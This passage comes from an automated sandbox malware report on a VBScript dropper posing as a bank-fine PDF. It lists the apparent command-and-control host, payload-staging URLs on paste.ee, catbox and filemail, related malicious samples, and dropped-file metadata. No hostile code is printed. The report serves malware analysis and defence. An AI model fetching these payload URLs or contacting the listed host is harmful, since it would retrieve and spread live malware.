function) 30->90 signatures14

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        LETA_pdf.vbs8%ReversingLabs
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://files.catbox.moe;0%Avira URL Cloudsafe
                        https://1017.filemail.com/api/f0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        files.catbox.moe
                        108.181.20.35
                        truefalse
                          high
                          paste.ee
                          172.67.187.200
                          truefalse
                            high
                            ip.1017.filemail.com
                            142.215.209.78
                            truefalse
                              high
                              deadpoolstart2025.duckdns.org
                              181.71.217.114
                              truetrue
                                unknown
                                1017.filemail.com
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  https://files.catbox.moe/zj1o07.txtfalse
                                    high
                                    https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904ffalse
                                      high
                                      https://paste.ee/d/0jfANfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6Spowershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://go.microsoft.copowershell.exe, 00000005.00000002.2294778196.000002416C1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com;wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://1017.filemail.compowershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://analytics.paste.eewscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aka.ms/pscore6powershell.exe, 00000005.00000002.2292182523.00000241540DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://paste.ee/d/0jfANwscript.exe, 00000000.00000003.2302592434.0000023843C89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305642751.0000023841FBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180833243.0000023843C87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2303965134.0000023843F60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2304522122.0000023841FBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://files.catbox.moe;powershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.google.comwscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://paste.ee/d/0jfANl6r.dllwscript.exe, 00000000.00000003.2303716053.0000023841D6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305294685.0000023841D83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2304423906.0000023841D80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://1017.filemail.com/api/fpowershell.exe, 00000009.00000002.2566881989.000002CA478A0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://paste.ee/#wscript.exe, 00000000.00000003.2299241877.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2298792949.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2302151095.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305487837.0000023841DD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://paste.ee:443/d/0jfANwscript.exe, 00000000.00000003.2299241877.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2298792949.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2302151095.0000023841DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2305487837.0000023841DD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://analytics.paste.ee;wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cdnjs.cloudflare.comwscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://aka.ms/pscore68powershell.exe, 00000005.00000002.2292182523.000002415412C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2948152527.000001BEAF2CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2948152527.000001BEAF28D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2568313693.000002CA49891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://files.catbox.moepowershell.exe, 00000009.00000002.2568313693.000002CA49AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2292182523.000002415415D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2948152527.000001BEAF28D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2568313693.000002CA49891000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.3427696368.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.3427696368.0000000002F0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://secure.gravatar.comwscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://themes.googleusercontent.comwscript.exe, 00000000.00000002.2305564366.0000023841E04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    172.67.187.200
                                                                                    paste.eeUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    181.71.217.114
                                                                                    deadpoolstart2025.duckdns.orgColombia
                                                                                    27831ColombiaMovilCOtrue
                                                                                    142.215.209.78
                                                                                    ip.1017.filemail.comCanada
                                                                                    32156HUMBER-COLLEGECAfalse
                                                                                    108.181.20.35
                                                                                    files.catbox.moeCanada
                                                                                    852ASN852CAfalse
                                                                                    IP
                                                                                    127.0.0.1
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1559694
                                                                                    Start date and time:2024-11-20 20:32:36 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 5m 48s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:14
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:LETA_pdf.vbs
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:DOCUMENTO_BANCARIO_APROBACION_MULTA_INMEDIATA_ad18184298489184ff189418941894ca189491841948ff48194919848ca5848919848484911555458_INFORMACION_COMPLETA_pdf.vbs
                                                                                    Detection:MAL
                                                                                    Classification:mal100.spre.troj.expl.evad.winVBS@15/8@4/5
                                                                                    EGA Information:Failed
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 99%
                                                                                    • Number of executed functions: 88
                                                                                    • Number of non-executed functions: 3
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .vbs
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target InstallUtil.exe, PID 6284 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 1136 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 5100 because it is empty
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: LETA_pdf.vbs
                                                                                    TimeTypeDescription
                                                                                    14:33:44API Interceptor2x Sleep call for process: wscript.exe modified
                                                                                    14:33:45API Interceptor76x Sleep call for process: powershell.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    172.67.187.200PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                    • paste.ee/d/tiRif
                                                                                    EWW.vbsGet hashmaliciousUnknownBrowse
                                                                                    • paste.ee/d/gFlKP
                                                                                    ODC#PO 4500628950098574654323567875765674433##633.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    • paste.ee/d/JxxYu
                                                                                    Purchase Order PO0193832.vbsGet hashmaliciousUnknownBrowse
                                                                                    • paste.ee/d/Bpplq
                                                                                    Name.vbsGet hashmaliciousUnknownBrowse
                                                                                    • paste.ee/d/0kkOm
                                                                                    517209487.vbsGet hashmaliciousXWormBrowse
                                                                                    • paste.ee/d/s0kJG
                                                                                    screen_shots.vbsGet hashmaliciousXWormBrowse
                                                                                    • paste.ee/d/GoCAw
                                                                                    66432890.vbsGet hashmaliciousUnknownBrowse
                                                                                    • paste.ee/d/D6Uw6
                                                                                    96874650.vbsGet hashmaliciousXWormBrowse
                                                                                    • paste.ee/d/yj4hE
                                                                                    1e#U041e.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                    • paste.ee/d/QkK2f
                                                                                    142.215.209.78seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                      pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                        PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                          seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                            Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                              bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                  seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                    Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                      kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        paste.eePO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.187.200
                                                                                                        DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                        • 188.114.97.3
                                                                                                        ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.97.3
                                                                                                        download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                                                        • 188.114.97.3
                                                                                                        SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Yeni sipari#U015f _TR-59647-WJO-001.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Scan112024.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Consulta de encomenda N#U00ba TM06-Q2-11-24.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        ip.1017.filemail.comseethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                        • 142.215.209.78
                                                                                                        #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                        • 142.215.209.78
                                                                                                        seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                        • 142.215.209.78
                                                                                                        files.catbox.moefile.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 108.181.20.35
                                                                                                        https://files.catbox.moe/iz3lne.zipGet hashmaliciousUnknownBrowse
                                                                                                        • 108.181.20.35
                                                                                                        file.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 108.181.20.35
                                                                                                        file.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 108.181.20.35
                                                                                                        Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                                                                        • 108.181.20.35
                                                                                                        1.cmdGet hashmaliciousUnknownBrowse
                                                                                                        • 108.181.20.35
                                                                                                        Exploit Detector.batGet hashmaliciousUnknownBrowse
                                                                                                        • 108.181.20.35
                                                                                                        Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                                                                        • 108.181.20.35
                                                                                                        SCV.cmdGet hashmaliciousUnknownBrowse
                                                                                                        • 108.181.20.35
                                                                                                        SCV.cmdGet hashmaliciousUnknownBrowse
                                                                                                        • 108.181.20.35
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        HUMBER-COLLEGECAseethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                        • 142.215.209.78
                                                                                                        #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                        • 142.215.209.78
                                                                                                        seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                        • 142.215.209.78
                                                                                                        ASN852CAi486.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 161.187.172.232
                                                                                                        New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 108.181.189.7
                                                                                                        need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 108.181.189.7
                                                                                                        owari.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 209.89.133.147
                                                                                                        63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 23.16.246.111
                                                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 64.114.213.248
                                                                                                        botx.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 137.186.136.235
                                                                                                        botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 199.126.73.29
                                                                                                        botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 66.183.57.134
                                                                                                        ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 108.181.20.35
                                                                                                        CLOUDFLARENETUSYyA4O1TBSW.dllGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.93.38
                                                                                                        zlibwapi.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.204.56
                                                                                                        YyA4O1TBSW.dllGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.93.38
                                                                                                        zlibwapi.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.204.56
                                                                                                        plutonium.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.235.11
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.155.248
                                                                                                        plutonium.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.235.12
                                                                                                        https://ambir.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                        • 172.67.142.245
                                                                                                        https://safelinks.mygo1.com/ls/click?upn=u001.1mDt7ytPYCJSVG-2BhF04Stdj4cHPTtKuY-2FmURzzu8QTldxw-2FzpyQYTJMxn3CPFnnsIuOY-2F5ruiOS6FLjm58JljkOmonXKnT8iwwYmA30I9bsERP5vx05gL85c3Lc-2F9WrpUfyNz12kcqjd3wt6WtaxLWxoHc5J3Zua9xQUurCc2AIjJtnP8Xu6Otzn8DBWsS0QPl2WC-2FCyrpDHulFvP0eEWn9IDo-2BqFc1GmD1SsVw5lRKY6yWeuyFQhUWIqZ4VCAeEroA6Ndqh9iaNvFz0XzERrEFYNTxkPirSQWkw6YqX5uo-3DaVWv_h5yw3DykLZfOpXzx776oAcLdVv6tuK-2FE7nfoR01CbnMOUH4fGhxn3KVtBew-2BRfJoKGgpvyhjBTXBTw1J6hN0wi-2FkZpowy1W9-2BTe-2Bf57Ts50FCXINRnefXkQ-2FFO3hKPeSa4hJKnd-2Bpj-2F7GS6r3Uq0ucRRb6izhExkinWfndIosIP-2Ff06hq3eO6ged-2F-2FYA1ldX-2BK4wuZipA-2BXRgTIkXvTbKj74iEMllOxCNkgoQZE3mKkIMM6o0L-2FNgq5TR8KcWZzS-2BEoZ1Oyop5AmC8zRE1SSKfnZ-2F0g1qg2dir-2F788Fq8CtpqmRpkFaF34nQcSYSfbixDSj0B5gj0fuY43UiPKR2D9s0w8lZaDR5dDYOswzPttauCIiIjiyfK20I-2BA4JjKFgGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.11.245
                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                        • 172.64.41.3
                                                                                                        ColombiaMovilCOaNZZ9YFI6g.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                        • 191.93.117.49
                                                                                                        spc.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 177.254.129.210
                                                                                                        xd.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 181.205.208.130
                                                                                                        xd.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 181.71.150.123
                                                                                                        xd.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 191.91.160.75
                                                                                                        botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 181.69.86.207
                                                                                                        x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 179.15.63.117
                                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 179.14.232.151
                                                                                                        pSU7fuySjo.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 177.255.81.103
                                                                                                        qPZwB2nc1W.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 177.253.157.75
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eplutonium.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        • 108.181.20.35
                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                        • 142.215.209.78
                                                                                                        • 108.181.20.35
                                                                                                        ahmbf.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        • 108.181.20.35
                                                                                                        seethebestthignswhichgivingbestopportunities.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        • 108.181.20.35
                                                                                                        LSMU CITATA LT 20-11-2024#U00b7pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 142.215.209.78
                                                                                                        • 108.181.20.35
                                                                                                        PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        • 108.181.20.35
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 142.215.209.78
                                                                                                        • 108.181.20.35
                                                                                                        prepper-wu.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        • 108.181.20.35
                                                                                                        SnapshotPc.ps1Get hashmaliciousUnknownBrowse
                                                                                                        • 142.215.209.78
                                                                                                        • 108.181.20.35
                                                                                                        Isabella County Emergency Management-protected.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 142.215.209.78
                                                                                                        • 108.181.20.35
                                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.187.200
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.187.200
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.187.200
                                                                                                        LxvS6uMf0g.exeGet hashmaliciousAcrid StealerBrowse
                                                                                                        • 172.67.187.200
                                                                                                        PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.187.200
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.187.200
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.187.200
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                        • 172.67.187.200
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.187.200
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.187.200
                                                                                                        No context
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):9434
                                                                                                        Entropy (8bit):4.928515784730612
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                        MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                        SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                        SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                        SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64
                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                        Malicious:false
                                                                                                        Preview:@...e...........................................................
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
